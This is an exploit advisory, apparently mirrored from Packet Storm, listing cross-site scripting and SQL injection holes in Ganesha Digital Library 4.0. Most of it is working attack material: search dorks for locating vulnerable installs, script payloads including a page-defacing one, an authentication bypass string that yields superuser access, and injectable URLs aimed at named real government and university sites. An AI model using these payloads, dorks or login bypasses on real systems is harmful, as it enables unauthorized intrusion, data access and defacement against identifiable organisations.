Lucene search
K

Ganesha Digital Library 4.0 Cross Site Scripting / SQL Injection

🗓️ 30 May 2012 00:00:00Reported by X-CisadaneType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 61 Views

Ganesha Digital Library 4.0 Multiple Vulnerabilities, including SQL Injection and XS

Code
`=====================================================  
Ganesha Digital Library 4.0 Multiple Vulnerabilities  
=====================================================  
  
:----------------------------------------------------------------------------------------------------------------------------------------:  
: # Exploit Title : Ganesha Digital Library 4.0 Multiple Vulnerabilities  
: # Date : 30 May 2012  
: # Author : X-Cisadane  
: # Software Link : kmrg.itb.ac.id  
: # Version : 4.x  
: # Category : Web Applications  
: # Vulnerability : SQL Injection Vulnerability & NON-Persistent XSS  
Vulnerability  
: # Tested On : Mozilla Firefox 7.0.1 (Windows)  
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Dunia Santai,Jiban Crew,  
CodeNesia, Axon Code, Jember Hacker, Explore Crew, Winda Utari  
:----------------------------------------------------------------------------------------------------------------------------------------:  
  
Description :  
=============  
Ganesha Digital Library (GDL) is a digital library software developed by  
Knowledge Management Research Group (KMRG) Institute of Technology Bandung  
(ITB) in order to harness the intellectual capital (intellectual capital)  
of ITB, which includes academic articles, journals, the final task, thesis,  
dissertation, research results, expertise and other directory.  
  
Dorks :  
=======  
inurl:"/office.php?m="  
intext:Copyright © 2002-2003 - KMRG ITB. All rights reserved  
intext:This work was carried out with the aid of a grant from YLTI  
Indonesia and IDRC Canada.  
intitle:" - GDL 4.0"  
  
POC :  
=====  
[1] NON-Persistent XSS in the Account Activation Section  
There is a security flaw (NON-Persistent XSS) in the Account Activation  
Section.  
For the example : Open http://digilib.litbang.depkes.go.id/ AND Click  
Activate Account in the left corner Menu. Then you'll be taken to Activate  
Account Page, Fill this script : '"><script>alert(1337)</script> on the  
Account Field and Code Field Then Click Activate.  
  
[2] NON-Persistent XSS in the Search Section  
XSS Script : '"><script>alert(1337)</script>  
For Example :  
http://www.djmbp.esdm.go.id/pustaka/search.php?s=[Insert XSS Script]  
  
[3] NON-Persistent XSS in /office.php?m=lang&langid=[Insert XSS Script]  
XSS Script : '"><script>alert(1337)</script>  
For Example :  
Type XSS Script like this --->  
http://digilib.litbang.depkes.go.id/office.php?m=lang&langid='"><script>alert(1337)</script>  
AND PRESS ENTER!  
Then you'll be taken to Error Page.  
Then edit the URL like this --->  
http://digilib.litbang.depkes.go.id/office.php?m=lang&langid=en AND PRESS  
ENTER!  
If it Successfull, it will appear a Message Box "1337"  
P.S : Login Required!  
  
[4] NON-Persistent XSS DEFACING  
XSS Script : http://digilib.litbang.depkes.go.id/publisher.php?id=<script>document.body.innerHTML="<h1>XSS  
Defacing</h1>This Site Has XSSed By : X-Cisadane<br/>Greetz To : Poni,  
Wilmar Kidz, Anharku, Artificial Intelligence, Winda Utari, etc<br/>Visit  
http://xcode.or.id";</script>  
  
[5] SQL Injection on The Login Form (Gain SuperUser Access!)  
Open Ganesha Digital Library 4.0 Login Page  
For the example : Open http://adln.lib.unair.ac.id/login.php  
On the Account Field, Fill with this Symbol : '=0#  
On the Password Field Don't Fill Anything!!! Then Click Login Button.  
If it Successfull, you'll be got a Superuser GDL Access!  
You can try another site such as :  
http://digilib.litbang.depkes.go.id/login.php  
http://digilib.p3gizi.litbang.depkes.go.id/login.php  
http://digilib.p3skk.litbang.depkes.go.id/login.php  
  
[6] SQL Injection on go.php?id=['SQL]  
SQL Injection on go.php?id=ID BLA BLA BLA&node=['SQL]  
SQL Injection on go.php?id=ID BLA BLA BLA&node=NODE ID BLA BLA  
BLA&start=['SQL]  
SQL Injection on go.php?id=ID BLA BLA BLA&node=NODE ID BLA BLA  
BLA&start=START ID BLA BLA BLA&node=['SQL]  
For Example :  
http://digilib.litbang.depkes.go.id/go.php?id='jkpkbppk-gdl-grey-2011-santoso-3848  
http://adln.lib.unair.ac.id/go.php?id='dlhub-gdl-s1-2012-dewantiarl-23785  
http://adln.lib.unair.ac.id/go.php?id=gdlhub-gdl-s1-2011-rizalabdul-15439&node='781&start=81&PHPSESSID=a46159e2d84c6d5fab6e581f7d3e7f3a  
http://adln.lib.unair.ac.id/go.php?id=gdlhub-gdl-s1-2011-rizalabdul-15439&node=781&start='81&PHPSESSID=a46159e2d84c6d5fab6e581f7d3e7f3a  
http://adln.lib.unair.ac.id/go.php?id=gdlhub-gdl-s1-2011-rizalabdul-15439&node=781&start=81&PHPSESSID=%27a46159e2d84c6d5fab6e581f7d3e7f3a  
  
[7] SQL Injection on publisher.php?id=['SQL]  
For Example :  
http://digilib.litbang.depkes.go.id/publisher.php?id=%27JBPEDONFAU  
  
[8] SQL Injection on go.php?node=['SQL]  
For Example :  
http://digilib.litbang.depkes.go.id/go.php?node='191  
http://digilib.p3gizi.litbang.depkes.go.id/go.php?node='25  
http://digilib.p3skk.litbang.depkes.go.id/go.php?node='32  
P.S : Login Required!  
  
[9] SQL Injection on office.php?m=explorer&a=['SQL]&b=expand&w=0  
For Example :  
http://digilib.litbang.depkes.go.id/office.php?m=explorer&a='191&b=expand&w=0  
http://digilib.p3gizi.litbang.depkes.go.id/office.php?m=explorer&a='25&b=expand&w=0  
http://digilib.p3skk.litbang.depkes.go.id/office.php?m=explorer&a='16&b=expand&w=0  
P.S : Login Required!  
  
[10] SQL Injection on office.php?m=user&a=['SQL]  
For Example :  
http://digilib.litbang.depkes.go.id/office.php?m=user&a='[email protected]&b=edit  
P.S : Login Required!  
  
[11] SQL Injction on office.php?m=workgroup&a=['SQL]&b=edit  
For Example :  
http://digilib.litbang.depkes.go.id/office.php?m=workgroup&a='1&b=edit  
P.S : Login Required!  
  
[12] SQL Injection on office.php?m=user&so=desc&sb=['SQL]  
For Example :  
http://digilib.litbang.depkes.go.id/office.php?m=user&so=desc&sb='FULL_NAME  
http://digilib.litbang.depkes.go.id/office.php?m=user&so=asc&sb='EMAIL  
http://digilib.litbang.depkes.go.id/office.php?m=user&so=asc&sb='GID  
http://digilib.litbang.depkes.go.id/office.php?m=user&so=asc&sb='CONFIRM  
P.S : Login Required!  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation